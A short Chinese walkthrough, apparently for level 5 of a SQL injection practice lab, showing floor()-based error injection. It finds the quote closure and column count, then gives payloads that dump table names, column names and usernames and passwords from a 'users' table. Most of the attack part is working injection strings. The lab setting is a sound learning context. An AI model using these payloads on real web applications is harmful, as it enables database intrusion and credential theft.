第五关之floor

1、找出闭合符号

 

 可以看出是单引号

2、判断有多少字段

 

 4不对，而3又出现正常页面，那字段就是3了

因为出现了报错信息，可以利用floor报错注入

3、爆库

 

可以看出来库名为security

4、爆表

?id=1' union select 1,count(*),concat_ws('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2)) as a from information_schema.tables group by a --+

 5爆字段

?id=1' union select 1,count(*),concat_ws('~',(select group_concat(column_name) from information_schema.columns where table_name='users'),floor(rand(0)*2)) as a from information_schema.tables group by a --+

 6、取值

 ?id=1' union select 1,count(*),concat_ws('~',(select  username from users limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a --+

这里的输出界面字数有限制，所以用limit 慢慢查就行了

 ?id=1' union select 1,count(*),concat_ws('~',(select  password from users limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a --+